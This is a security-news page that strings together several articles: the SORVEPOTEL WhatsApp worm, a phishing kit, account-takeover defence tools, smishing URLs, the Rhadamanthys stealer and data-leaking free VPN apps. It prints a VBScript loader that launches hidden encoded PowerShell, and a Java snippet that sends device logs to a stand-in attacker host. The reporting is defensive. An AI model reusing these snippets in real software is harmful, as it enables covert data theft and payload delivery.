Enterprise networks worldwide are facing an aggressive, self-propagating malware campaign that exploits WhatsApp as its primary delivery mechanism.
First observed in early September 2025 targeting Brazilian organizations, SORVEPOTEL spreads through convincing phishing messages carrying malicious ZIP attachments.
Upon execution, the malware not only establishes a foothold on the host system but also hijacks active WhatsApp Web sessions to replicate itself across all contacts and groups associated with the compromised account.
This unprecedented blend of social engineering and automated propagation has elevated SORVEPOTEL into a significant threat for enterprises relying on messaging platforms for internal communication.
Initial reports traced the campaign to phishing messages bearing archive names such as RES-20250930112057.zip or ORCAMENTO114418.zip, masquerading as innocuous documents like receipts or budgets.
These messages prompt users to “baixa o zip no PC e abre” (download the ZIP on PC and open it), explicitly targeting desktop sessions to maximize enterprise impact.
Trend Micro analysts identified that an alternative infection vector involves phishing emails distributing similarly named ZIP attachments, often appearing to originate from trusted institutions with subjects like “ComprovanteSantander-75319981.682657420.zip.”
Once the ZIP is extracted, the victim encounters a deceptive Windows shortcut (.LNK) file designed to launch a hidden PowerShell script, which downloads and executes the primary payload from attacker-controlled domains.
Attack Chain
As the .LNK file executes, it invokes an encoded command that launches a batch script in a concealed window.
The SORVEPOTEL attack chain (Source – Trend Micro)
This attack chain illustrates the encrypted command line within the shortcut that leverages the PowerShell Invoke-Expression (IEX) function with the -enc parameter for payload obfuscation.
This script retrieves a secondary batch file payload and establishes persistence by copying itself into the Windows Startup folder.
Through a series of Base64-encoded PowerShell commands, the malware generates URLs pointing to command-and-control (C2) servers and uses Net.WebClient to fetch additional components, which are then executed in memory.
The decrypted command inside the batch file connects to the C2 infrastructure. By employing typo-squatted domains such as sorvetenopotel.com (a play on the Portuguese phrase “sorvete no pote”), the attackers blend malicious traffic with legitimate network flows, evading basic detection mechanisms.
Once persistence is in place, the malware scans for active WhatsApp Web sessions. Upon locating an authenticated session, SORVEPOTEL automatically propagates the same malicious ZIP across all contacts and groups.
This automated spam not only multiplies infection rates but often results in compromised accounts being banned for violating WhatsApp’s terms of service.
By combining social engineering, script-based execution, and rapid session hijacking, SORVEPOTEL demonstrates a novel escalation in messaging-platform attacks.
The malware’s focus on widespread distribution rather than immediate data theft underscores a shift toward maximizing reach and operational disruption.
Organizations should enforce strict endpoint policies to block unauthorized shortcuts, disable auto-download features in messaging applications, and conduct regular user awareness training to mitigate the evolving risk posed by self-propagating threats like SORVEPOTEL.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
A novel phishing kit has surfaced that enables threat actors to craft sophisticated lures with minimal technical expertise.
This “point-and-click” toolkit combines an intuitive web interface with powerful payload delivery mechanisms.
Attackers can select from preconfigured templates, customize branding elements, and target specific organizations or individuals.
Once a phishing page is deployed, victims are presented with seemingly innocuous download prompts that, in reality, trigger the delivery of malicious code.
Ad promoting the Impact Solutions payload delivery kit to cybercriminals (Source – Abnormal.ai)
Early incidents show the kit leveraging common file formats such as Microsoft Office documents and HTML applications.
Upon opening, the documents prompt users to enable macros or allow execution of embedded scripts.
Outsourcing the heavy lifting to built-in scripting engines, the kit constructs payloads on the fly, rendering many static signature–based defenses ineffective.
Initial campaign data indicates a significant click-through rate, suggesting the social engineering elements are exceptionally convincing.
Abnormal.ai analysts noted that the kit’s landing pages employ dynamic content injection to evade URL filtering solutions by rotating resource identifiers every few minutes.
This approach frustrates automated scanners and contributes to extended dwell time on victim machines, allowing stealthy payload staging and execution.
Researchers identified instances where the payload download URLs were concealed behind multi-step redirects, disguising their true destination until the final fetch operation.
Furthermore, Abnormal.ai researchers identified that once the victim enables content execution, the embedded script executes a PowerShell one-liner that retrieves and executes the final payload from a remote server.
This PowerShell command is obfuscated in Base64 and wrapped in a compressed archive, bypassing most heuristic engines. Victims remain unaware as the process runs with minimal user interaction and no visible windows.
In-Depth Examination of the Infection Mechanism
At the heart of the kit’s infection chain lies an HTML Application (HTA) module that acts as the initial loader.
Fake invoice HTML page telling victims to open a file that launches malware (Source – Abnormal.ai)
When the victim clicks “Enable Editing” or “Allow Blocked Content,” the HTA file executes:-
[script language="VBScript"]
Dim objShell
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " & _
"JABlAHgAZQBjAGUAbQBUAG8ARABvAHcAbgBsAG8AZABGAGUAcgBfAFIAZQBzAG8AdQByAGMAZQA9ICJuU0M…"
[/script]
This snippet decodes to a PowerShell payload that downloads an encrypted binary, decrypts it in memory, and executes it directly from RAM.
By operating in memory, the kit avoids writing malicious files to disk, undermining file-based detection.
The downloaded binary functions as a modular loader, fetching additional components such as credential stealers or ransomware droppers.
Persistence is achieved by creating a hidden scheduled task that re-launches the loader every hour under the context of the logged-on user.
This tactic ensures continued access even if the initial document is closed or the machine is rebooted. The scheduled task name is randomized for each campaign, complicating manual detection efforts.
Overall, this point-and-click phishing kit represents a significant escalation in accessible attack capabilities, combining user-friendly interfaces with advanced evasion and payload delivery techniques.
Cybersecurity teams must prioritize monitoring for anomalous task scheduler entries and unusual HTA executions, as well as reinforcing user training around enabling content in untrusted documents.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
An aggressive malware campaign dubbed SORVEPOTEL is exploiting WhatsApp messages to infiltrate Windows systems, with its epicenter in Brazil. Rather than pursuing data theft or ransomware extortion, this self-propagating malware is engineered for rapid spread, leveraging social trust and automation to reach new victims. Trend Research telemetry shows that 457 of the 477 detected infections […]
Account Takeover (ATO) attacks have become one of the most pressing security concerns for businesses in 2025.
With the rise of credential stuffing, phishing, brute force attacks, and bot-driven fraud, organizations must reinforce their digital defenses.
Account takeover can lead to stolen customer data, financial losses, trust damage, and regulatory consequences. Protecting online accounts is no longer optional; it’s a necessity.
The best way to mitigate ATO attacks is by using account takeover protection tools that combine behavioral analysis, AI-driven anomaly detection, strong authentication, and bot management.
To help businesses choose wisely, we’ve ranked the Top 10 Best Account Takeover Protection Tools 2025 with complete specifications, features, reasons to buy, pros, cons, and best-fit suggestions.
Why Account Takeover Protection Tools 2025
Cybercriminals are becoming increasingly sophisticated, leveraging automated scripts, bots, and stolen credentials from past breaches.
Businesses that operate in e-commerce, financial services, SaaS, and social platforms are especially vulnerable.
Implementing a strong ATO protection tool not only safeguards users but also prevents financial fraud and enhances compliance with global data protection regulations.
This list highlights solutions known for real-time threat detection, API protection, bot mitigation, authentication, and user experience optimization.
Whether you’re a startup, enterprise, or online marketplace, these tools address security and scalability needs in 2025.
Comparison Table: Top 10 Best Account Takeover Protection Tools 2025
DataDome is one of the leading account takeover protection tools in 2025 because of its robust real-time bot detection and credential stuffing prevention capabilities.
This solution leverages machine learning to analyze every request and distinguish legitimate users from malicious actors. It scans billions of data signals, enabling businesses to stay ahead of emerging threats.
Its API-first approach ensures seamless integration with multiple platforms like e-commerce, SaaS, and financial services.
We picked DataDome because it combines bot supervision, advanced ML algorithms, and easy deployment without impacting user experience.
Specifications
DataDome comes with a cloud-native architecture, which ensures high scalability for small and enterprise businesses. It integrates machine learning-driven traffic analysis that updates in milliseconds to stop malicious traffic.
The solution works across websites, mobile apps, and APIs without requiring complex development changes
Features
DataDome provides AI-driven fraud prevention, bot detection, strong credential abuse protection, and mobile SDK support. It includes dashboards for administrators to monitor and review account activity.
Businesses can customize workflows and determine their security thresholds according to risks. E-commerce and financial platforms particularly benefit from its credential stuffing prevention.
Reason to Buy
Businesses should invest in DataDome for its accuracy in detecting bot-driven fraud, simplicity in deployment, and seamless integrations across digital ecosystems.
It ensures a balance between user experience and strong security, making it one of the top solutions to fight automated account takeovers in 2025.
Pros
Real-time bot and fraud detection
Scalable for large traffic volumes
Easy to integrate with apps and APIs
GDPR-compliant
Cons
No free trial available
May require tuning for custom security use cases
Best For: Enterprises needing high-traffic protection with AI-driven fraud and credential abuse prevention.
Akamai Account Protector stands as one of the most advanced solutions against account takeover in 2025 due to its comprehensive bot management, fraud detection, and high resilience in large-scale environments.
We picked this tool because Akamai’s massive threat intelligence network gives businesses access to one of the largest real-time data lakes in the cybersecurity world.
It continuously analyzes billions of requests across the globe, identifying attack patterns and protecting businesses before cybercriminals strike.
With Akamai, organizations get predictive capabilities through AI, which reduces friction for legitimate customers while blocking malicious bot traffic.
Specifications
Akamai Account Protector integrates AI-driven behavioral analytics with a cloud-first design. It leverages Akamai’s global CDN infrastructure to detect attacks at the edge.
This ensures ultra-low latency during user verification. It is compatible with multiple identity systems and supports MFA.
Features
The tool provides bot detection, credential stuffing prevention, multi-factor authentication (MFA) support, and API protection. It uses adaptive learning to monitor user patterns and detect anomalies in real-time.
Its customer-friendly frictionless authentication is designed to reduce false positives. The platform includes session monitoring, device fingerprinting, and integration with SIEM solutions.
Reason to Buy
Organizations should choose Akamai for its blend of large-scale performance, threat intelligence network, and AI-powered account takeover defense.
Its ability to prevent fraud in real-time without hurting user experience makes it a dependable security solution for large enterprises.
Pros
Enterprise-level scalability
Strong threat intelligence network
Seamless integration with APIs and apps
Low latency authentication checks
Cons
More suitable for large enterprises than small businesses
Pricing may be higher than other tools
Best For: Large enterprises needing global-scale account takeover protection with AI-driven intelligence.
Imperva Advanced Bot Protection is one of the most reliable tools against automated credential abuse and account fraud.
We selected Imperva because it excels in identifying malicious bots while simultaneously protecting sensitive customer accounts. Its sophisticated algorithms analyze intent and distinguish between good and bad bots across websites, applications, and APIs.
What makes Imperva unique is the balance between detection precision and prevention without disrupting legitimate traffic. It is known for targeted solutions against massive credential stuffing attacks and automated scalping bots.
Specifications
Imperva leverages cloud-based mitigation paired with global attack intelligence. It comes with real-time data analysis, device fingerprinting, and behavioral machine learning.
Its API protection ensures secure transactions while supporting enterprise-level scalability. It integrates with fraud databases and features reports with actionable threat insights.
Features
Key features include bot traffic mitigation, credential stuffing filters, device intelligence, granular attack analytics, and multi-layer defense.
It offers data-driven decisions through rich dashboards with visual attack breakdowns. Its adaptive authentication features help businesses minimize risks without unnecessary login friction.
Reason to Buy
Imperva should be chosen for its robust bot filtering accuracy and tailored solutions for industries frequently targeted by bots. Security leaders value its flexibility and data-rich visibility for fraud analysis.
Pros
High accuracy threat detection
Strong for financial and retail industries
Rich reporting and dashboards
Cloud-based + scalable design
Cons
No free trial
Can be complex during heavy customization
Best For: Companies needing bot protection and fine-grained visibility into fraudulent traffic.
Webz.io makes this list because of its dark web intelligence and monitoring capabilities, providing businesses with proactive protection insights.
Account takeover often stems from compromised credentials being sold or leaked on underground forums, and Webz.io specializes in scanning that hidden web.
We picked this tool because it detects stolen email/password pairs and notifies businesses early, allowing preemptive action before those accounts are exploited.
Unlike tools that focus only on runtime detection, Webz.io identifies external risks by monitoring hacker forums, IRC chats, marketplaces, and credential leak databases.
Specifications
Webz.io is a data intelligence platform specializing in dark web monitoring. It scans millions of sources for stolen data, exposed credentials, and malicious chatter.
With flexible API integrations, businesses can connect dark web insights directly into their SOC or fraud prevention pipelines. It works in real-time and sends alerts for high-risk findings.
Features
Webz.io provides credential leak detection, dark web and deep web scanning, API integrations, and continuous monitoring services. It enables early warning alerts about compromised accounts and supports custom feeds tailored by business type.
Reason to Buy
For businesses looking to proactively stop account takeover by catching stolen credentials before use, Webz.io is an essential tool.
It complements bot and fraud detection systems with external threat intelligence.
Pros
Specialized dark web monitoring
Real-time stolen credential detection
Easy API and SOC integrations
Early warning against fraud risks
Cons
Limited direct bot detection features
Requires additional fraud prevention pairing
Best For: Businesses needing dark web monitoring for stolen credentials and early prevention.
Telesign is included because of its advanced multi-factor authentication and fraud prevention APIs that strengthen identity verification processes.
We picked Telesign as it emphasizes securing access through verification codes, two-factor authentication (2FA), and trusted communications.
For businesses facing threats from credential stuffing or phishing-driven takeovers, Telesign ensures that only the right person can access the right account.
Its combination of fraud scoring, phone-based verification, and strong authentication makes it stand out. .
Specifications
Telesign provides APIs for 2FA, phone verification, fraud scoring, and identity services.
It uses data signals including phone intelligence and reputation scoring to determine access risks. Its infrastructure supports global SMS delivery and real-time voice alerts.
Features
It includes verification APIs, SMS one-time passcodes, fraud scoring models, and trusted communication APIs.
Businesses can integrate Telesign into onboarding, transactions, and logins with minimal effort. Its machine learning engine analyzes risk patterns and applies adaptive responses.
Reason to Buy
Telesign should be considered by companies prioritizing user verification and scalable authentication systems. Its API-driven identity checks provide strong protection against credential abuse.
Pros
Strong fraud scoring and verification APIs
Cost-effective and developer-friendly
Broad international communication reach
Flexible deployment via APIs
Cons
Relies heavily on telecom channels
Less focus on bot-driven ATO
Best For: Businesses needing robust API-driven identity and authentication protection.
Forter is one of the most trusted account takeover protection tools in 2025, primarily because of its focus on frictionless fraud prevention.
We chose Forter for this list as it provides real-time trust decisions at scale, leveraging data shared across a global fraud prevention network.
This unique network allows Forter to quickly identify risky logins, credential stuffing attempts, and unusual account behaviors that could indicate account takeover.
The tool is known for its ability to minimize friction and improve user experience while still delivering strong protection.
Specifications
Forter comes with cloud-based fraud detection, AI-driven authentication, and an extensive trust network that evaluates events in real time.
It integrates seamlessly with checkout systems, login portals, and APIs. The platform is designed to scale with enterprise demands, particularly in retail and payments.
Features
Key features include fraud detection, behavioral analytics, risk profiling, credential stuffing identification, and frictionless user authentication.
It supports multiple integration options, including SDKs and APIs. Forter also provides advanced reporting and analytics for visibility into fraud risks.
Reason to Buy
Forter is ideal if your business needs instant trust decisions that prevent ATO without hurting user experience. It empowers enterprises with a scalable, low-latency fraud prevention tool trusted globally.
Pros
Global fraud prevention network
Instant risk decisioning
Frictionless protection
Strong focus on e-commerce industry
Cons
Best suited for enterprises, not SMBs
Pricing may be complex for smaller businesses
Best For: Large e-commerce and online payments needing seamless fraud prevention.
Beyond Identity was selected for this list because it eliminates passwords one of the most common entry points for account takeover attacks.
By focusing on passwordless authentication, Beyond Identity reduces credential theft risks entirely. We picked this platform since it leverages cryptographic key pairs and biometrics to authenticate users without reliance on passwords.
The platform stands out because it creates a zero-trust authentication framework, ensuring that only verified and trusted devices can access sensitive accounts.
Unlike solutions that just monitor logins, Beyond Identity takes a preventive security-first approach, making it cutting-edge for 2025.
Specifications
The tool offers passwordless authentication based on public/private key cryptography and biometric verification.
It supports FIDO2 standards, device intelligence, and continuous risk-based authentication. With easy SDK and API integration, Beyond Identity is developer-friendly for modern tech stacks.
Features
Its main features include passwordless logins, device trust verification, secure identity management, compliance tools, and conditional policy controls.
It provides strong user protection without compromising convenience. The system works across web and mobile platforms with minimal latency.
Reason to Buy
Beyond Identity removes passwords and replaces them with secure, frictionless authentication based on cryptography. It’s a strong investment for businesses that want to make ATO almost impossible.
Pros
Eliminates password vulnerabilities
Supports FIDO2 framework
Strong authentication + device trust
Improves UX with frictionless access
Cons
May require cultural adoption for passwordless systems
Limited for businesses wanting traditional MFA
Best For: Organizations needing passwordless, zero-trust authentication against ATO.
Sift earned a spot on this list because of its machine-learning-powered fraud detection and behavioral analytics engine.
We picked Sift as it continuously monitors user activity in real time, allowing businesses to detect unusual login patterns, credential stuffing, and bot-driven attempts instantly.
Sift is known for its Digital Trust & Safety Suite, which combines account takeover prevention with payment fraud, content integrity, and abuse prevention.
By focusing on maintaining trust across customer journeys, Sift offers a holistic approach. Enterprises value this solution as it cuts down both risk and friction, especially in industries like fintech, marketplaces, and travel.
Specifications
Sift uses behavioral machine learning, real-time fraud detection, and global risk signals to assess threats.
It offers API-first deployment and can integrate with multiple web, mobile, and enterprise applications. It supports advanced anomaly detection and large-scale monitoring of login activities.
Features
The tool includes account protection against credential stuffing, real-time fraud scoring, adaptive authentication, behavioral biometrics, and reporting dashboards.
Businesses can also take advantage of its machine learning engine that evolves with threats.
Reason to Buy
Sift is a good choice for businesses that require scalable machine-learning driven fraud prevention across multiple risk scenarios, including account takeovers.
Pros
Holistic fraud prevention suite
Real-time global risk signals
Adaptive AI-driven authentication
Ideal for fintech and marketplaces
Cons
Pricing may vary based on usage
Advanced features require configuration expertise
Best For: Businesses needing scalable AI-powered fraud and ATO detection.
Kount makes our list due to its AI-driven identity trust platform that prevents account takeovers through advanced identity verification.
We picked Kount because it offers strong fraud detection across logins, new account creation, and payments. Its patented Identity Trust Global Network shares intelligence across industries to stop fraudulent activity at scale.
The tool is widely recognized in fintech and e-commerce for its high accuracy in identifying ATO attacks while providing customizable workflows to enterprises.
Kount’s ability to detect fake accounts and block account takeovers before they cause damage makes it a standout. It is designed with enterprise scale in mind, offering a reliable and proven fraud protection stack.
Specifications
Kount operates using AI, machine learning, and patented identity trust analytics. It integrates easily through APIs into login systems and e-commerce platforms.
Designed for enterprise scale, the platform handles large volumes of logins and payment transactions with minimal latency.
Features
Core features include global identity trust monitoring, behavioral biometrics, new account fraud detection, bot-blocking, and session intelligence. It also provides fraud risk scores in real time.
Reason to Buy
Kount is a strong investment for businesses that want intelligent, adaptable, and large-scale fraud protection focusing on identity-first account takeover defense.
Pros
Uses patented ID Trust Global Network
Strong for payment fraud + ATO
AI-driven adaptive protection
Seamless integrations with apps and APIs
Cons
May be costly for smaller businesses
Advanced features may require technical expertise
Best For: E-commerce and financial services needing advanced identity trust-based fraud prevention.
Radware Bot Manager is included because of its robust bot mitigation technology tailored for account takeover.
We selected Radware due to its advanced detection of sophisticated bots attempting credential stuffing, brute force attacks, or scraping activities.
By monitoring behavioral and intent-based data signals, Radware efficiently identifies harmful automation. The tool is effective in protecting businesses from both large-scale coordinated attacks and subtle low-and-slow bot operations.
It also empowers security teams with actionable analytics for review. This makes it a great option for enterprises involved in e-commerce, gaming, banking, or any high-risk online environment.
Specifications
Radware Bot Manager includes AI and intent-based bot analysis with cloud-native deployment. It integrates with WAFs, APIs, and load balancers.
The platform can serve global businesses across multiple regions while ensuring high-speed response at scale.
Features
Key features include sophisticated bot detection, API protection, device fingerprinting, user behavior analysis, dynamic honeypots, and reporting dashboards.
It also supports adaptive policy controls for fine-grained bot traffic management.
Reason to Buy
Radware Bot Manager is an excellent solution for enterprises that deal with bots as part of their account takeover threat landscape. It offers strong, customizable anti-bot defense.
Pros
Strong bot mitigation
Customizable protection policies
Adaptive AI-based analysis
Real-time analytics
Cons
Pricing not suitable for SMBs
May involve complex deployment for non-enterprises
Best For: Enterprises combating advanced bot-driven ATO attacks.
The Top 10 Best Account Takeover Protection Tools 2025 present a mix of AI-driven fraud detection, behavioral analytics, passwordless authentication, and dark web monitoring.
From DataDome’s advanced bot protection to Beyond Identity’s passwordless model and Kount’s identity trust network, each tool addresses account takeover attacks in unique ways.
Businesses must choose based on scale, integration needs, and industry focus.
Small-to-medium businesses might prefer Telesign or Sift, while large enterprises with global platforms may rely on Akamai, Forter, or Radware.
Regardless of the choice, adopting one of these solutions is essential to counter growing ATO attacks in 2025.
Cybercriminals have launched a sophisticated campaign that leverages brand impersonation techniques to distribute malware through deceptive SMS phishing (smishing) attacks.
This emerging threat demonstrates an evolution in social engineering tactics, where attackers strategically craft URLs containing trusted brand names to bypass user skepticism and security filters.
The attack methodology centers on manipulating URL structures to create false legitimacy.
Threat actors embed recognizable brand names before the “@” symbol in malicious URLs, followed by the actual malicious domain.
This technique exploits user psychology, as recipients often focus on familiar brand names rather than scrutinizing the complete URL structure.
Unit 42 researchers identified that this wave of attacks extends beyond simple URL manipulation, incorporating deceptively named group messaging campaigns and strategically aged hostnames to enhance credibility.
Attackers are now distributing #smishing URLs with the name of a trusted entity before the @ symbol, followed by the true domain to deceive users. This wave of attacks also involves deceptively named group texts and strategically aged hostnames. Details at https://t.co/FttCPMXr65pic.twitter.com/3MuJvQC0bI
The attackers have demonstrated particular interest in utilizing .xin domain extensions, which provide an additional layer of obfuscation while maintaining apparent legitimacy.
The campaigns typically initiate through SMS messages appearing to originate from legitimate organizations, directing recipients to click malicious links for account verification, delivery notifications, or security alerts.
Upon interaction, these URLs redirect users to credential harvesting pages or trigger automatic malware downloads targeting mobile and desktop platforms.
Advanced Infection Mechanisms and Domain Tactics
The sophisticated nature of these attacks lies in their multi-stage infection process and domain preparation strategies. Attackers pre-register domains months in advance, allowing them to establish domain reputation scores that evade automated security screening.
The malicious infrastructure employs rotating subdomains and URL shortening services to complicate tracking efforts.
Example malicious URL structure:
hxxps://amazon-security@malicious-domain.xin/verify-account
The payload delivery mechanism utilizes progressive profiling, where initial clicks gather device fingerprinting data before deploying platform-specific malware variants.
This approach maximizes infection success rates while minimizing detection by security solutions that rely on static URL analysis.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Rhadamanthys, a sophisticated multi-modular information stealer, first emerged in September 2022 and has since evolved into one of the most commercially advanced malware offerings on underground forums.
Originally advertised by the actor “kingcrete2022,” its initial design drew heavily on the earlier Hidden Bee project, enabling rapid feature growth and professional polish.
Over time, Rhadamanthys steadily gained traction through targeted campaigns such as ClickFix, attracting both novice affiliates and seasoned threat actors.
As of October 2025, the latest 0.9.2 release introduces incremental refinements to its loader architecture, custom executable formats, and evasion routines, reinforcing its position as a long-term business venture rather than a disposable side project.
Check Point analysts noted that Rhadamanthys is marketed under the “RHAD Security” and “Mythical Origin Labs” brands, complete with a revamped Tor storefront, Telegram support channel, and tiered licensing model.
The malware is offered at $299 per month for a self-hosted package and $499 per month for a rented server deployment, with enterprise pricing available through individual negotiation.
Pricing of Rhadamanthys (Source – Check Point)
This professionalization underscores the developers’ commitment to sustained feature development, robust support, and ongoing customization options.
Technically, Rhadamanthys is distributed via a polymorphic initial loader available in both .NET and native PE forms. The native 32- and 64-bit loaders unpack into shellcode that deploys a proprietary XS format package containing core modules.
Each module—ranging from environment checks to the stealer core—is obfuscated in a custom container, requiring specialized conversion tools to reconstruct into standard PE files for analysis.
Attackers’ website, main view (Source – Check Point)
The latest modifications in version 0.9.x introduce XS1B and XS2B headers, a streamlined import deobfuscation key, and updated configuration markers swapped from 0x59485221 to 0xBEEF.
Infection Mechanism
A key infection vector in Rhadamanthys 0.9.2 involves steganographic delivery of the Stage 3 payload via PNG images rather than the earlier WAV or JPG templates.
Upon establishing a WebSocket connection to its C2, the embedded Netclient module retrieves a seemingly innocuous PNG that encodes the next-stage package in pixel data.
The loader processes the image header to locate a shared secret, then applies ChaCha20 decryption followed by LZO decompression to extract the XS2B modules.
Core deobfuscation routines employ an RC4-based algorithm replacing the prior XOR scheme, ensuring existing IDA scripts fail until updated.
Example decryption pseudocode:-
void rc4_decrypt(uint8_t *data, size_t len, uint8_t *key, size_t keylen) {
uint8_t S[256], i = 0, j = 0, tmp;
for (int k = 0; k < 256; k++) S[k] = k;
for (int k = 0; k < 256; k++) {
j = (j + S[k] + key[k % keylen]) & 0xFF;
tmp = S[k]; S[k] = S[j]; S[j] = tmp;
}
i = j = 0;
for (size_t k = 0; k < len; k++) {
i = (i + 1) & 0xFF;
j = (j + S[i]) & 0xFF;
tmp = S[i]; S[i] = S[j]; S[j] = tmp;
data[k] ^= S[(S[i] + S[j]) & 0xFF];
}
}
This shift to PNG-based steganography reduces the need for complex media parsing and simplifies payload retrieval under the guise of ordinary web traffic.
Once unpacked, Stage 3 modules deploy into a suspended legitimate process chosen from a configurable list, then inject the stealer core to harvest credentials, browser profiles, crypto wallets, and system fingerprints.
Through this streamlined infection chain and flexible delivery options, Rhadamanthys continues to challenge defenders and underscores the importance of monitoring custom image-based payloads alongside traditional executable attachments.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
A new toolkit named Impact Solutions has emerged on cybercrime forums, offering a comprehensive, user-friendly framework for crafting advanced phishing campaigns. By democratizing malware delivery, Impact Solutions empowers even low-skill threat actors to bypass both end users and conventional security filters, delivering malicious payloads via seemingly innocuous attachments. This article explores the mechanics of Impact […]
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a high-severity security flaw impacting Smartbedded Meteobridge to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
The vulnerability, CVE-2025-4008 (CVSS score: 8.7), is a case of command injection in the Meteobridge web interface that could result in code execution.
“
Mobile VPN apps promise to protect privacy and secure communications on smartphones, but a comprehensive analysis of nearly 800 free Android and iOS VPN applications reveals a troubling reality: many of these tools expose sensitive information rather than shield it.
From insecure configurations to dangerous permissions and outdated libraries, the apps that millions trust are often the weakest link in both personal and enterprise security.
The implications of widespread data leakage extend well beyond individual privacy—corporate networks, BYOD policies, and high-value targets all stand to suffer from unexpected exposures.
Emerging over the past year, this trend exploits users’ desire for cost-free encryption and unrestricted browsing.
Attackers hiding within otherwise legitimate VPN interfaces can intercept credentials, harvest device identifiers, and even record ambient audio.
Zimperium analysts noted the discovery of dozens of apps that transmitted unencrypted user metadata to remote servers, bypassing any semblance of secure tunnel encryption.
These findings underscore how easily threat actors can exploit the trust placed in free VPN services.
Initial infection vectors vary by platform. On Android, several VPN packages are repackaged with malicious modules that trigger stealth network requests upon app launch.
On iOS, misconfigured privacy manifests and over-permissive entitlements allow apps to silently collect and exfiltrate location, usage logs, and crash reports. In both ecosystems, a combination of missing certificate validation and exposed APIs creates fertile ground for man-in-the-middle and data-harvesting attacks.
Many victims remain unaware until unusual network traffic patterns or unexplained account lockouts emerge. Corporate defenders often dismiss free VPNs as harmless productivity tools, inadvertently granting them carte blanche within corporate firewalls.
By the time logs reveal outbound requests to dubious domains—complete with personal identifiers—the breach is already well underway.
Permission Abuse and Data Exfiltration
A critical mechanism enabling these leaks is the abuse of dangerous permissions that far exceed a VPN’s legitimate scope.
For instance, on Android, the READ_LOGS permission lets an app read all system logs—including fragments of user input and authentication tokens—and forward them to an attacker’s server.
A sample Java snippet below illustrates how easily a malicious module captures logs and delivers them via HTTP:-
Process process = Runtime.getRuntime().exec("logcat -d");
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(process.getInputStream()));
StringBuilder log = new StringBuilder();
String line;
while ((line = bufferedReader.readLine()) != null) {
log.append(line).append("\n");
}
HttpURLConnection conn = (HttpURLConnection) new URL("https://malicious.example.com/collect").openConnection();
conn.setRequestMethod("POST");
conn.setDoOutput(true);
conn.getOutputStream().write(log.toString().getBytes(StandardCharsets.UTF_8));
conn.getInputStream();
This covert channel bypasses standard VPN encryption and sidesteps user awareness. On iOS, private entitlements such as LOCATION_ALWAYS grant constant GPS access, allowing apps to fuse real-time movement with browsing data.
Potential security and privacy issues (Source – Zimperium)
This depicts the prevalence of excessive permissions among analyzed VPN apps. By exploiting permission overreach, these free VPN apps transform trusted privacy tools into surveillance platforms.
Users and organizations must scrutinize permissions and vet VPN providers rigorously, favoring solutions with transparent security practices and regular code maintenance.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Cisco Talos has revealed that UAT-8099, a Chinese-speaking cybercrime group, has been exploiting vulnerable Internet Information Services (IIS) servers across multiple countries to conduct search engine optimization (SEO) fraud and steal high-value data. Identified in April 2025, this group targets reputable IIS servers in India, Thailand, Vietnam, Canada, and Brazil, focusing on organizations such as […]
.webp)
.webp)
.webp)
Yes
No.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)